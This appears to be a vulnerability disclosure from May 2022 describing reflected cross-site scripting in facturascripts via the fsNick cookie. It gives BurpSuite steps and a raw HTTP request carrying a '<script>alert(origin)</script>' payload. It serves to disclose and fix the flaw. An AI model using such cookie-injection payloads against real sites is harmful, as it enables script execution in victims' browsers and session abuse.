Cross-site Scripting (XSS) via Cookie Value in neorazorx/facturascripts
May 4th 2022
The is an XSS could be trigger via cookie value.
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.
Proof of Concept
1.Go to a random page, intercept the request using BurpSuite.
2.Change the Cookie's Value of
3.The script tag will be reflected in web page
GET /facturascripts/ HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Cookie: fsNick=abc<script>alert(origin)</script>;fsLogkey=8EVl2Ac1dQMy0b5aDWgpvehmwNIkiSxuJ76HKZjLzCX9YBGTr4Utf3onPqsRFO;fsLang=en_EN;fsCompany=1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Host: my.facturascripts.site Connection: Keep-alive
- XSS Triggered